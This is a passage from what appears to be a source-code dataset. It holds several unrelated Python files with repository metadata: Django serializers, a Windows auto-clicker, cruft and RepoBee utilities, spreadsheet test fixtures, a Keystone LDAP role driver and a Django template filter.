    #url = serializers.HyperlinkedIdentityField(view_name="input:id")
    pk = serializers.ReadOnlyField()
    type = serializers.SerializerMethodField()
    tags = TagListSerializerField()
    permissions = serializers.SerializerMethodField()
    device = DeviceSerializer(many=False)
    class Meta:
        model = Output
        fields = '__all__'
        #fields = ('pk', 'url', 'ph_sn', 'index', 'output_type', 'deleted', 'description', 'total_progress', '_my_state',)
    def get_type(self, obj):
        """Map the 1-based output_type code to its display name, or 'UNKNOWN'."""
        try:
            return Output.OUTPUT_TYPES[obj.output_type-1][1]
        except Exception as ex:
            return 'UNKNOWN'
    def get_permissions(self, obj):
        """Return obj.permissions, or 'UNKNOWN' when it is missing/raises."""
        try:
            return obj.permissions
        except Exception as ex:
            return 'UNKNOWN'
class OutputSimpleSerializer(OutputSerializer):
    """Compact Output serializer used for list-style payloads."""
    #type = serializers.SerializerMethodField()
    #tags = TagListSerializerField()
    class Meta(OutputSerializer.Meta):
        #model = Output
        fields = 'pk', 'description', 'state', 'type', 'tags', 'execution_limit', 'started_time', 'current_position', 'permissions', 'supports_schedules'
    #def get_type(self, obj):
    #    try:
    #        return Output.OUTPUT_TYPES[obj.output_type-1][1]
    #    except Exception as ex:
    #        return 'UNKNOWN'
class OutputAdminSerializer(OutputSimpleSerializer):
    """Admin view of an output: also exposes the owning device and index."""
    class Meta(OutputSimpleSerializer.Meta):
        #model = Output
        fields = 'pk', 'description', 'state', 'type', 'tags', 'execution_limit', 'started_time', 'current_position', 'permissions', 'supports_schedules', 'device', 'index'
#class IOsSerializer(serializers.Serializer):
# inputs = InputSerializer(many=True, read_only=True)
# outputs = OutputSerializer(many=True, read_only=True)
class TagSerializer(serializers.ModelSerializer):
    """Serializes taggit Tag objects with every model field."""
    class Meta:
        model = Tag
        fields = '__all__'
| 32.552995 | 172 | 0.625283 | 3,770 | 0.533692 | 0 | 0 | 0 | 0 | 0 | 0 | 4,368 | 0.618347 |
d59ce46ab897a4326a316a12b1908c1b167c893a | 894 | py | Python | bin/clicker.py | Martincic/click-automatizer | 1b4f4303b7d40bcaac470238ab21837f2fbad92a | [
"MIT"
] | 1 | 2022-02-05T11:05:58.000Z | 2022-02-05T11:05:58.000Z | bin/clicker.py | Martincic/click-automatizer | 1b4f4303b7d40bcaac470238ab21837f2fbad92a | [
"MIT"
] | null | null | null | bin/clicker.py | Martincic/click-automatizer | 1b4f4303b7d40bcaac470238ab21837f2fbad92a | [
"MIT"
] | null | null | null | from threading import Thread
from time import sleep
import win32api, win32con
import pyautogui
import keyboard
import os
def clickPositions(all_positions, repeat, timeout):
    """Click each position in sequence until `repeat` clicks have been made.

    all_positions: iterable of objects with .x/.y screen coordinates.
    repeat: total number of clicks to perform (converted with int()).
    timeout: delay in seconds before every click (converted with float()).
    """
    #Activate safety killswitch (pressing ESC hard-exits the process)
    thread = Thread(target = safetyKillswitch)
    thread.start()

    max_clicks = int(repeat)
    delay = float(timeout)
    # Robustness: a non-positive repeat count means there is nothing to do
    # (previously repeat=0 looped forever).
    if max_clicks <= 0:
        return

    clicks_done = 0
    while True:
        for position in all_positions:
            sleep(delay)
            click(position.x, position.y)
            clicks_done += 1
            # Bug fix: stop as soon as the requested click count is reached.
            # The old code only cleared a flag checked by the outer loop, so
            # it finished the current pass over all_positions first,
            # producing extra clicks beyond `repeat`.
            if clicks_done == max_clicks:
                return
def click(x,y):
    """Move the cursor to (x, y) and perform one left mouse click (Windows only)."""
    win32api.SetCursorPos((x,y))
    win32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN,x,y,0,0)
    win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP,x,y,0,0)
def safetyKillswitch():
    """Block until ESC is pressed, then hard-exit the whole process (os._exit)."""
    while True:
        keyboard.wait("esc")
        print("ESC key pressed! Emergency exit activated... ")
        os._exit(1)
| 24.833333 | 63 | 0.667785 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 79 | 0.088367 |
d59eac60ee49212e2ee889df53673f9ab5d4edcb | 150 | py | Python | bugtests/test256.py | doom38/jython_v2.2.1 | 0803a0c953c294e6d14f9fc7d08edf6a3e630a15 | [
"CNRI-Jython"
] | null | null | null | bugtests/test256.py | doom38/jython_v2.2.1 | 0803a0c953c294e6d14f9fc7d08edf6a3e630a15 | [
"CNRI-Jython"
] | null | null | null | bugtests/test256.py | doom38/jython_v2.2.1 | 0803a0c953c294e6d14f9fc7d08edf6a3e630a15 | [
"CNRI-Jython"
] | null | null | null | """
"""
import support
# Compile the Jython test module to Java bytecode with the core runtime
# bundled into the output jar; errors are written to test256.err.
support.compileJPythonc("test256a.py", core=1, jar="test256.jar", output="test256.err")
#raise support.TestError("" + `x`)
| 15 | 87 | 0.673333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 81 | 0.54 |
d59ed04f2f421d592db7ca01711e238752f15f07 | 1,307 | py | Python | cruft/_commands/utils/cruft.py | timothycrosley/cruft | 4d503c144d7268345c56f9ef4221a56ffc706739 | [
"MIT"
] | 87 | 2019-09-25T07:41:27.000Z | 2020-08-17T20:09:52.000Z | cruft/_commands/utils/cruft.py | timothycrosley/cruft | 4d503c144d7268345c56f9ef4221a56ffc706739 | [
"MIT"
] | 47 | 2019-10-03T05:33:34.000Z | 2020-08-16T09:03:35.000Z | cruft/_commands/utils/cruft.py | timothycrosley/cruft | 4d503c144d7268345c56f9ef4221a56ffc706739 | [
"MIT"
] | 9 | 2019-09-24T06:51:31.000Z | 2020-08-06T07:59:47.000Z | import json
from pathlib import Path
from typing import Any, Dict
from git import Repo
from cruft.exceptions import CruftAlreadyPresent, NoCruftFound
CruftState = Dict[str, Any]
#######################
# Cruft related utils #
#######################
def get_cruft_file(project_dir_path: Path, exists: bool = True) -> Path:
    """Return the path of a project's .cruft.json file.

    Raises CruftAlreadyPresent when the file exists but ``exists`` is False,
    and NoCruftFound when the file is missing but ``exists`` is True.
    """
    candidate = project_dir_path / ".cruft.json"
    present = candidate.is_file()
    if present and not exists:
        raise CruftAlreadyPresent(candidate)
    if exists and not present:
        raise NoCruftFound(project_dir_path.resolve())
    return candidate
def is_project_updated(repo: Repo, current_commit: str, latest_commit: str, strict: bool) -> bool:
    """Return True when the project is up to date with the template repo.

    Non-strict mode additionally accepts the current commit being newer than
    (a descendant of) the latest known template commit.
    """
    return (
        # If the latest commit exactly matches the current commit
        latest_commit == current_commit
        # Or if there have been no changes to the cookiecutter
        or not repo.index.diff(current_commit)
        # or if the strict flag is off, we allow for newer commits to count as up to date
        or (
            repo.is_ancestor(repo.commit(latest_commit), repo.commit(current_commit)) and not strict
        )
    )
def json_dumps(cruft_state: Dict[str, Any]) -> str:
    """Serialize *cruft_state* as pretty-printed JSON ending in a newline."""
    serialized = json.dumps(
        cruft_state, ensure_ascii=False, indent=2, separators=(",", ": ")
    )
    return "{}\n".format(serialized)
| 31.119048 | 100 | 0.673298 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 285 | 0.218057 |
d59f1dcccbd32af829381dd3853ec683d08d3461 | 8,604 | py | Python | src/_repobee/main.py | tohanss/repobee | cf5eb1e83e62c20bbca00c8ad9f798a612e1664f | [
"MIT"
] | null | null | null | src/_repobee/main.py | tohanss/repobee | cf5eb1e83e62c20bbca00c8ad9f798a612e1664f | [
"MIT"
] | null | null | null | src/_repobee/main.py | tohanss/repobee | cf5eb1e83e62c20bbca00c8ad9f798a612e1664f | [
"MIT"
] | null | null | null | """Main entrypoint for the repobee CLI application.
.. module:: main
:synopsis: Main entrypoint for the repobee CLI application.
.. moduleauthor:: Simon Larsén
"""
import argparse
import contextlib
import io
import logging
import os
import pathlib
import sys
from typing import List, Optional, Union, Mapping
from types import ModuleType
import repobee_plug as plug
import _repobee.cli.dispatch
import _repobee.cli.parsing
import _repobee.cli.preparser
import _repobee.cli.mainparser
from _repobee import plugin
from _repobee import exception
from _repobee import config
from _repobee.cli.preparser import separate_args
from _repobee import distinfo
from _repobee import disthelpers
_PRE_INIT_ERROR_MESSAGE = """exception was raised before pre-initialization was
complete. This is usually due to incorrect settings.
Try running the `verify-settings` command and see if
the problem can be resolved. If all fails, please open
an issue at https://github.com/repobee/repobee/issues/new
and supply the stack trace below.""".replace(
"\n", " "
)
def run(
    cmd: List[str],
    config_file: Union[str, pathlib.Path] = "",
    plugins: Optional[List[Union[ModuleType, plug.Plugin]]] = None,
    workdir: Union[str, pathlib.Path] = ".",
) -> Mapping[str, List[plug.Result]]:
    """Run RepoBee with the provided options.

    Mostly intended for testing plugins. This is almost equivalent to
    running RepoBee from the CLI, except that preparser options must be
    passed as arguments to this function (they cannot be part of ``cmd``),
    and there is no top-level error handling, so exceptions propagate
    instead of just being logged.

    .. important::

        All plugins are unregistered after execution, including any
        plugins that were registered before this function was called.

    Args:
        cmd: The command to run.
        config_file: Path to the configuration file.
        plugins: A list of plugin modules and/or plugin classes.
        workdir: The working directory to run RepoBee in.
    Returns:
        A mapping (plugin_name -> plugin_results).
    """
    config_file = pathlib.Path(config_file)
    cur_workdir = pathlib.Path(".").absolute()
    # resolve(strict=True) raises immediately if the workdir does not exist.
    requested_workdir = pathlib.Path(str(workdir)).resolve(strict=True)

    @contextlib.contextmanager
    def _in_requested_workdir():
        # Temporarily chdir into the requested workdir; always chdir back.
        try:
            os.chdir(requested_workdir)
            yield
        finally:
            os.chdir(cur_workdir)

    def _ensure_is_module(p: Union[ModuleType, plug.Plugin]):
        # Wrap a plugin *class* in a synthetic module so both classes and
        # modules can be registered uniformly below.
        if isinstance(p, type) and issubclass(p, plug.Plugin):
            mod = ModuleType(p.__name__.lower())
            mod.__package__ = f"__{p.__name__}"
            setattr(mod, p.__name__, p)
            return mod
        elif isinstance(p, ModuleType):
            return p
        else:
            raise TypeError(f"not plugin or module: {p}")

    wrapped_plugins = list(map(_ensure_is_module, plugins or []))

    with _in_requested_workdir():
        try:
            _repobee.cli.parsing.setup_logging()
            # FIXME calling _initialize_plugins like this is ugly, should be
            # refactored
            _initialize_plugins(argparse.Namespace(no_plugins=False, plug=[]))
            plugin.register_plugins(wrapped_plugins)
            parsed_args, api = _parse_args(cmd, config_file)
            with _set_output_verbosity(getattr(parsed_args, "quiet", 0)):
                return _repobee.cli.dispatch.dispatch_command(
                    parsed_args, api, config_file
                )
        finally:
            # Guarantee a clean plugin registry regardless of outcome.
            plugin.unregister_all_plugins()
def main(sys_args: List[str], unload_plugins: bool = True):
    """Start the repobee CLI, exiting with status 1 on any failure.

    Args:
        sys_args: Arguments from the command line.
        unload_plugins: If True, plugins are automatically unloaded just
            before the function returns.
    """
    try:
        _main(sys_args, unload_plugins)
    except Exception:
        # Point the user at the FAQ instead of dumping a raw traceback.
        failure_notice = (
            "RepoBee exited unexpectedly. "
            "Please visit the FAQ to try to resolve the problem: "
            "https://repobee.readthedocs.io/en/stable/faq.html"
        )
        plug.log.error(failure_notice)
        sys.exit(1)
def _main(sys_args: List[str], unload_plugins: bool = True):
    """Parse and dispatch a CLI invocation, logging errors before re-raising.

    ``pre_init`` tracks whether we are still before full initialization;
    errors raised that early get special, gentler reporting.
    """
    _repobee.cli.parsing.setup_logging()
    args = sys_args[1:]  # drop the name of the program
    traceback = False
    pre_init = True
    try:
        # Split preparser options (e.g. --plug) from the actual command.
        preparser_args, app_args = separate_args(args)
        parsed_preparser_args = _repobee.cli.preparser.parse_args(
            preparser_args
        )
        _initialize_plugins(parsed_preparser_args)
        parsed_args, api = _parse_args(
            app_args, parsed_preparser_args.config_file
        )
        traceback = parsed_args.traceback
        pre_init = False
        with _set_output_verbosity(getattr(parsed_args, "quiet", 0)):
            _repobee.cli.dispatch.dispatch_command(
                parsed_args, api, parsed_preparser_args.config_file
            )
    except exception.PluginLoadError as exc:
        plug.log.error(f"{exc.__class__.__name__}: {exc}")
        raise
    except exception.ParseError as exc:
        plug.log.error(str(exc))
        raise
    except Exception as exc:
        # FileErrors can occur during pre-init because of reading the config
        # and we don't want tracebacks for those (afaik at this time)
        if traceback or (
            pre_init and not isinstance(exc, exception.FileError)
        ):
            plug.log.error(str(exc))
            if pre_init:
                plug.echo(_PRE_INIT_ERROR_MESSAGE)
            plug.log.exception("Critical exception")
        else:
            # "{.__class__.__name__}" formats the class name of the first
            # argument (exc); only the short message is shown here.
            plug.log.error("{.__class__.__name__}: {}".format(exc, str(exc)))
        raise
    finally:
        if unload_plugins:
            plugin.unregister_all_plugins()
def _initialize_plugins(parsed_preparser_args: argparse.Namespace) -> None:
    """Initialize default, dist, active, and preparser-specified plugins.

    Honors ``--no-plugins`` by skipping everything except the defaults
    (and dist plugins on dist installs).
    """
    # IMPORTANT: the default plugins must be loaded before user-defined
    # plugins to ensure that the user-defined plugins override the defaults
    # in firstresult hooks
    plug.log.debug("Initializing default plugins")
    plugin.initialize_default_plugins()

    if distinfo.DIST_INSTALL:
        plug.log.debug("Initializing dist plugins")
        plugin.initialize_dist_plugins()

    if not parsed_preparser_args.no_plugins:
        if distinfo.DIST_INSTALL:
            plug.log.debug("Initializing active plugins")
            plugin.initialize_plugins(
                disthelpers.get_active_plugins(), allow_filepath=True
            )

        plug.log.debug("Initializing preparser-specified plugins")
        plugin_names = parsed_preparser_args.plug or []
        plugin.initialize_plugins(plugin_names, allow_filepath=True)
def _parse_args(args, config_file):
    """Execute config hooks, parse the CLI args, then let plugins
    post-process the parsed namespace. Returns ``(parsed_args, api)``.
    """
    config.execute_config_hooks(config_file)
    namespace, api = _repobee.cli.parsing.handle_args(
        args, config_file=config_file
    )
    plug.manager.hook.handle_processed_args(args=namespace)
    return namespace, api
@contextlib.contextmanager
def _set_output_verbosity(quietness: int):
"""Set the output verbosity, expecting `quietness` to be a non-negative
integer.
0 = do nothing, all output goes
1 = silence "regular" user feedback
2 = silence warnings
>=3 = silence everything
"""
assert quietness >= 0
if quietness >= 1:
# silence "regular" user feedback by redirecting stdout
with contextlib.redirect_stdout(io.StringIO()):
if quietness == 2:
# additionally silence warnings
_repobee.cli.parsing.setup_logging(
terminal_level=logging.ERROR
)
pass
elif quietness >= 3:
# additionally silence errors and warnings
_repobee.cli.parsing.setup_logging(
terminal_level=logging.CRITICAL
)
pass
yield
else:
# this must be in an else, because
# 1) the generator must yeld
# 2) it must yield precisely once
yield
# Script entry point: forward the raw argv (program name included) to main.
if __name__ == "__main__":
    main(sys.argv)
| 32.345865 | 79 | 0.65516 | 0 | 0 | 4,055 | 0.471238 | 1,266 | 0.147124 | 0 | 0 | 3,228 | 0.375131 |
d59f3c58b006cd25a25b2736e3fa1fa4e2390ff6 | 6,871 | py | Python | tests/config.py | kokokuo/auto_send_email | 509672dcb09a2a587ccfb8de4cf2d008c7bac5aa | [
"MIT"
] | 1 | 2019-06-20T15:07:25.000Z | 2019-06-20T15:07:25.000Z | tests/config.py | kokokuo/mailmerger | 509672dcb09a2a587ccfb8de4cf2d008c7bac5aa | [
"MIT"
] | 5 | 2019-05-23T09:51:46.000Z | 2021-08-01T09:49:33.000Z | tests/config.py | kokokuo/auto_send_email | 509672dcb09a2a587ccfb8de4cf2d008c7bac5aa | [
"MIT"
] | null | null | null | from enum import Enum
class TestCommonConfig(object):
    """Constants shared across the test suite."""
    # Name of the logger used while testing.
    LOGGER_NAME = "testing-logger"
    # Directory name for spreadsheet test fixtures.
    SHEET_TEST_DIRNAME = "sheets"
    # Directory name for e-mail template test fixtures.
    EMAIL_TEMPLATE_TEST_DIRNAME = "templates"
class TestSheetColHeader(Enum):
    """
    Column header definitions for TestEnHeader.xlsx and TestCnHeader.xlsx;
    the only difference between the two files is English vs. Chinese headers.
    """
    # English headers (TestEnHeader.xlsx).
    EN_HOTELNAME = "HotelName"
    EN_ADDRESS = "Address"
    EN_PHONE = "Phone"
    EN_TOTAL_ROOMS = "TotalRooms"
    EN_WEBSITE_URL = "WebsiteUrl"
    EN_EMAIL = "Email"
    # Chinese headers (TestCnHeader.xlsx).
    CN_HOTELNAME = "旅館名稱"
    CN_ADDRESS = "地址"
    CN_PHONE = "聯絡電話"
    CN_TOTAL_ROOMS = "總房間數"
    CN_WEBSITE_URL = "網址"
    CN_EMAIL = "信箱"
class TestSheetConfig(object):
    """Filenames and worksheet names of the spreadsheet fixtures."""
    TEST_EN_HEADER_SHEET_FILENAME = "TestEnHeader.xlsx"
    TEST_CN_HEADER_SHEET_FILENAME = "TestCnHeader.xlsx"
    # A filename that intentionally does not exist on disk.
    TEST_NON_EXIST_SHEET_FILENAME = "NotExistSheetFile.xlsx"
    # A file that exists but is not in Excel format.
    TEST_NON_EXCEL_FORMAT_FILE = "TestFileNotExcelFormat.txt"
    """
    檔案的試算表名稱
    """
    # Worksheet names inside the fixture files (including two that
    # intentionally do not exist).
    TEST_EN_HEADER_SHEET_NAME = "HotelsInfo"
    TEST_EN_HEADER_NON_EXIST_SHEET_NAME = "sheet1"
    TEST_CN_HEADER_NON_EXIST_SHEET_NAME = "試算表"
    TEST_CN_HEADER_SHEET_NAME = "旅館資訊"
class TestParsinExcelSheetConfig(object):
    """
    Expected per-row data for TestEnHeader.xlsx; differs from
    TestCnHeader.xlsx only in that the column headers are in English.
    """
    # Rows of TestEnHeader.xlsx, keyed by the English column headers.
    TEST_DATASHEET_EN_HEADER_ROW_A = {
        TestSheetColHeader.EN_HOTELNAME.value: "台北君悅酒店",
        TestSheetColHeader.EN_ADDRESS.value: "110臺北市信義區松壽路2號",
        TestSheetColHeader.EN_PHONE.value: "02-2720-1234",
        TestSheetColHeader.EN_TOTAL_ROOMS.value: 865,
        TestSheetColHeader.EN_WEBSITE_URL.value: "http://taipei.grand.hyatt.com",
        TestSheetColHeader.EN_EMAIL.value: "taipei.grand@hyatt.com"
    }
    TEST_DATASHEET_EN_HEADER_ROW_B = {
        TestSheetColHeader.EN_HOTELNAME.value: "凱達大飯店",
        TestSheetColHeader.EN_ADDRESS.value: "108臺北市萬華區艋舺大道167號",
        TestSheetColHeader.EN_PHONE.value: "02-2306-6777",
        TestSheetColHeader.EN_TOTAL_ROOMS.value: 745,
        TestSheetColHeader.EN_WEBSITE_URL.value: "http://www.caesarmetro.com",
        TestSheetColHeader.EN_EMAIL.value: "cm.reservation@caesarpark.com.tw"
    }
    TEST_DATASHEET_EN_HEADER_ROW_C = {
        TestSheetColHeader.EN_HOTELNAME.value: "王朝大酒店",
        TestSheetColHeader.EN_ADDRESS.value: "105臺北市松山區敦化北路100號",
        TestSheetColHeader.EN_PHONE.value: "02-27198399",
        TestSheetColHeader.EN_TOTAL_ROOMS.value: 713,
        TestSheetColHeader.EN_WEBSITE_URL.value: "http://www.sunworlddynasty.com.tw",
        TestSheetColHeader.EN_EMAIL.value: "bc@sunworlddynasty.com.tw",
    }
    """
    TestCnHeader.xlsx 每 Row 資料:Column 標頭定義中文
    """
    # The same three rows, keyed by the Chinese column headers.
    TEST_DATASHEET_CN_HEADER_ROW_A = {
        TestSheetColHeader.CN_HOTELNAME.value: "台北君悅酒店",
        TestSheetColHeader.CN_ADDRESS.value: "110臺北市信義區松壽路2號",
        TestSheetColHeader.CN_PHONE.value: "02-2720-1234",
        TestSheetColHeader.CN_TOTAL_ROOMS.value: 865,
        TestSheetColHeader.CN_WEBSITE_URL.value: "http://taipei.grand.hyatt.com",
        TestSheetColHeader.CN_EMAIL.value: "taipei.grand@hyatt.com"
    }
    TEST_DATASHEET_CN_HEADER_ROW_B = {
        TestSheetColHeader.CN_HOTELNAME.value: "凱達大飯店",
        TestSheetColHeader.CN_ADDRESS.value: "108臺北市萬華區艋舺大道167號",
        TestSheetColHeader.CN_PHONE.value: "02-2306-6777",
        TestSheetColHeader.CN_TOTAL_ROOMS.value: 745,
        TestSheetColHeader.CN_WEBSITE_URL.value: "http://www.caesarmetro.com",
        TestSheetColHeader.CN_EMAIL.value: "cm.reservation@caesarpark.com.tw"
    }
    TEST_DATASHEET_CN_HEADER_ROW_C = {
        TestSheetColHeader.CN_HOTELNAME.value: "王朝大酒店",
        TestSheetColHeader.CN_ADDRESS.value: "105臺北市松山區敦化北路100號",
        TestSheetColHeader.CN_PHONE.value: "02-27198399",
        TestSheetColHeader.CN_TOTAL_ROOMS.value: 713,
        TestSheetColHeader.CN_WEBSITE_URL.value: "http://www.sunworlddynasty.com.tw",
        TestSheetColHeader.CN_EMAIL.value: "bc@sunworlddynasty.com.tw",
    }
    """
    TestCnHeader.xlsx 的第四筆資料,作為測試錯誤的預期結果使用
    """
    # Fourth row of TestCnHeader.xlsx, used to build *failing* expectations.
    TEST_DATASHEET_CN_HEADER_ROW_D = {
        TestSheetColHeader.CN_HOTELNAME.value: "台北寒舍喜來登大飯店",
        TestSheetColHeader.CN_ADDRESS.value: "100臺北市中正區忠孝東路1段12號",
        TestSheetColHeader.CN_PHONE.value: "02-2321-5511",
        TestSheetColHeader.CN_TOTAL_ROOMS.value: 692,
        TestSheetColHeader.CN_WEBSITE_URL.value: "http://www.sheratongrandtaipei.com",
        TestSheetColHeader.CN_EMAIL.value: "sheraton@sheratongrandtaipei.com",
    }
    """
    TestEnHeader.xlsx 與 TestCnHeader.xlsx 的預期正確測試資料
    """
    # Expected (correct) parse results for the two fixture files.
    TEST_EN_HEADER_SHEET_EXPECTED_RESULT = [
        TEST_DATASHEET_EN_HEADER_ROW_A,
        TEST_DATASHEET_EN_HEADER_ROW_B,
        TEST_DATASHEET_EN_HEADER_ROW_C
    ]
    TEST_CN_HEADER_SHEET_EXPECTED_RESULT = [
        TEST_DATASHEET_CN_HEADER_ROW_A,
        TEST_DATASHEET_CN_HEADER_ROW_B,
        TEST_DATASHEET_CN_HEADER_ROW_C
    ]
    """
    TestCnHeader.xlsx 的預期錯誤測試,分別為資料不同 與 順序不同
    """
    # Intentionally wrong expectations: rows out of order, and a row
    # replaced by ROW_D, respectively.
    TEST_CN_HEADER_SHEET_NON_EXPECTED_RESULT_DATA_DIFF = [
        TEST_DATASHEET_CN_HEADER_ROW_A,
        TEST_DATASHEET_CN_HEADER_ROW_C,
        TEST_DATASHEET_CN_HEADER_ROW_B
    ]
    TEST_CN_HEADER_SHEET_NON_EXPECTED_RESULT_ORDER_DIFF = [
        TEST_DATASHEET_CN_HEADER_ROW_A,
        TEST_DATASHEET_CN_HEADER_ROW_B,
        TEST_DATASHEET_CN_HEADER_ROW_D
    ]
class TestParsingSourceConfig(object):
    """
    Expected merged column headers and row data for pre-merge sources.
    """
    # Expected (correct) merged column headers and rows.
    TEST_CH_PREMERGE_SOURCE_EXPECTED_COLHEADER = [
        TestSheetColHeader.CN_HOTELNAME.value,
        TestSheetColHeader.CN_ADDRESS.value,
        TestSheetColHeader.CN_PHONE.value,
        TestSheetColHeader.CN_TOTAL_ROOMS.value,
        TestSheetColHeader.CN_WEBSITE_URL.value,
        TestSheetColHeader.CN_EMAIL.value
    ]
    TEST_CH_PREMERGE_SOURCE_EXPECTED_ROWSET = \
        TestParsinExcelSheetConfig.TEST_CN_HEADER_SHEET_EXPECTED_RESULT
    """
    預期錯誤的合併 Column 標頭 以及 資料 - 資料不正確
    """
    # Intentionally wrong expectations: two headers swapped to English.
    TEST_CH_PREMERGE_SOURCE_NON_EXPECTED_COLHEADER_DATA_DIFF = [
        TestSheetColHeader.EN_HOTELNAME.value,
        TestSheetColHeader.CN_ADDRESS.value,
        TestSheetColHeader.CN_PHONE.value,
        TestSheetColHeader.CN_TOTAL_ROOMS.value,
        TestSheetColHeader.CN_WEBSITE_URL.value,
        TestSheetColHeader.EN_EMAIL.value
    ]
    TEST_CH_PREMERGE_SOURCE_NON_EXPECTED_ROWSET_DATA_DIFF = \
        TestParsinExcelSheetConfig.TEST_CN_HEADER_SHEET_NON_EXPECTED_RESULT_DATA_DIFF
    """
    預期錯誤的合併 Column 標頭 以及 資料 - 順序不正確
    """
    # Intentionally wrong expectations: headers in the wrong order.
    TEST_CH_PREMERGE_SOURCE_NON_EXPECTED_COLHEADER_ORDER_DIFF = [
        TestSheetColHeader.CN_HOTELNAME.value,
        TestSheetColHeader.CN_TOTAL_ROOMS.value,
        TestSheetColHeader.CN_PHONE.value,
        TestSheetColHeader.CN_WEBSITE_URL.value,
        TestSheetColHeader.CN_EMAIL.value,
        TestSheetColHeader.CN_ADDRESS.value
    ]
    TEST_CH_PREMERGE_SOURCE_NON_EXPECTED_ROWSET_ORDER_DIFF = \
        TestParsinExcelSheetConfig.TEST_CN_HEADER_SHEET_NON_EXPECTED_RESULT_ORDER_DIFF
| 35.973822 | 86 | 0.726968 | 7,412 | 0.995033 | 0 | 0 | 0 | 0 | 0 | 0 | 2,071 | 0.278024 |
d5a06a4c867599293195597044d34e40bd2610d7 | 4,055 | py | Python | keystone/assignment/role_backends/ldap.py | yanheven/keystone | 417b8941095f40674575ed951b4a03ebcdc91fef | [
"Apache-2.0"
] | null | null | null | keystone/assignment/role_backends/ldap.py | yanheven/keystone | 417b8941095f40674575ed951b4a03ebcdc91fef | [
"Apache-2.0"
] | null | null | null | keystone/assignment/role_backends/ldap.py | yanheven/keystone | 417b8941095f40674575ed951b4a03ebcdc91fef | [
"Apache-2.0"
] | 1 | 2020-07-02T09:12:28.000Z | 2020-07-02T09:12:28.000Z | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from oslo_config import cfg
from oslo_log import log
from keystone import assignment
from keystone.common import ldap as common_ldap
from keystone.common import models
from keystone import exception
from keystone.i18n import _
from keystone.identity.backends import ldap as ldap_identity
CONF = cfg.CONF
LOG = log.getLogger(__name__)
class Role(assignment.RoleDriver):
    """LDAP-backed role driver."""

    def __init__(self):
        super(Role, self).__init__()
        self.LDAP_URL = CONF.ldap.url
        self.LDAP_USER = CONF.ldap.user
        self.LDAP_PASSWORD = CONF.ldap.password
        self.suffix = CONF.ldap.suffix

        # This is the only deep dependency from resource back
        # to identity. The assumption is that if you are using
        # LDAP for resource, you are using it for identity as well.
        self.user = ldap_identity.UserApi(CONF)
        self.role = RoleApi(CONF, self.user)

    def get_role(self, role_id):
        # Delegates straight to the LDAP-backed RoleApi.
        return self.role.get(role_id)

    def list_roles(self, hints):
        # NOTE: `hints` is accepted but not applied by the LDAP backend.
        return self.role.get_all()

    def list_roles_from_ids(self, ids):
        return [self.get_role(id) for id in ids]

    def create_role(self, role_id, role):
        """Create a role, rejecting duplicate IDs and duplicate names."""
        self.role.check_allow_create()
        # A role with this ID must NOT already exist.
        try:
            self.get_role(role_id)
        except exception.NotFound:
            pass
        else:
            msg = _('Duplicate ID, %s.') % role_id
            raise exception.Conflict(type='role', details=msg)

        # Nor may a role with the same name exist.
        try:
            self.role.get_by_name(role['name'])
        except exception.NotFound:
            pass
        else:
            msg = _('Duplicate name, %s.') % role['name']
            raise exception.Conflict(type='role', details=msg)

        return self.role.create(role)

    def delete_role(self, role_id):
        self.role.check_allow_delete()
        return self.role.delete(role_id)

    def update_role(self, role_id, role):
        self.role.check_allow_update()
        # Raises RoleNotFound if the role does not exist.
        self.get_role(role_id)
        return self.role.update(role_id, role)
# NOTE(heny-nash): A mixin class to enable the sharing of the LDAP structure
# between here and the assignment LDAP.
class RoleLdapStructureMixin(object):
    """LDAP schema constants for the role subtree (shared with the
    assignment LDAP backend, per the module comment above)."""
    DEFAULT_OU = 'ou=Roles'
    DEFAULT_STRUCTURAL_CLASSES = []
    DEFAULT_OBJECTCLASS = 'organizationalRole'
    # LDAP attribute holding the users assigned to a role.
    DEFAULT_MEMBER_ATTRIBUTE = 'roleOccupant'
    NotFound = exception.RoleNotFound
    options_name = 'role'
    attribute_options_names = {'name': 'name'}
    immutable_attrs = ['id']
    model = models.Role
# TODO(termie): turn this into a data object and move logic to driver
class RoleApi(RoleLdapStructureMixin, common_ldap.BaseLdap):
    """Low-level LDAP CRUD operations for roles."""

    def __init__(self, conf, user_api):
        super(RoleApi, self).__init__(conf)
        self._user_api = user_api

    def get(self, role_id, role_filter=None):
        model = super(RoleApi, self).get(role_id, role_filter)
        return model

    def create(self, values):
        return super(RoleApi, self).create(values)

    def update(self, role_id, role):
        """Update a role; renaming onto another role's name is a conflict."""
        new_name = role.get('name')
        if new_name is not None:
            try:
                old_role = self.get_by_name(new_name)
                # The name may match only if it is this very role.
                if old_role['id'] != role_id:
                    raise exception.Conflict(
                        _('Cannot duplicate name %s') % old_role)
            except exception.NotFound:
                # Name unused: safe to rename.
                pass
        return super(RoleApi, self).update(role_id, role)

    def delete(self, role_id):
        super(RoleApi, self).delete(role_id)
| 32.18254 | 76 | 0.663872 | 2,936 | 0.724044 | 0 | 0 | 0 | 0 | 0 | 0 | 1,051 | 0.259186 |
d5a0d14841cc76eb2977a0ec7007fa46827f4e51 | 355 | py | Python | backend/apps/volontulo/templatetags/labeled_status.py | magul/volontulo | 778168219e003b585604ee88cc54d03575bdc00e | [
"MIT"
] | 16 | 2016-10-29T19:45:11.000Z | 2021-04-23T03:54:22.000Z | backend/apps/volontulo/templatetags/labeled_status.py | magul/volontulo | 778168219e003b585604ee88cc54d03575bdc00e | [
"MIT"
] | 1,063 | 2016-10-28T17:43:39.000Z | 2018-12-12T17:42:19.000Z | backend/apps/volontulo/templatetags/labeled_status.py | magul/volontulo | 778168219e003b585604ee88cc54d03575bdc00e | [
"MIT"
] | 60 | 2016-11-02T18:28:35.000Z | 2018-11-07T17:01:05.000Z | # -*- coding: utf-8 -*-
u"""
.. module:: labeled_status
"""
from django import template
from apps.volontulo.utils import OFFERS_STATUSES
register = template.Library()
@register.filter(name='human')
def human(status):
    u"""Template filter mapping an offer status key to its description.

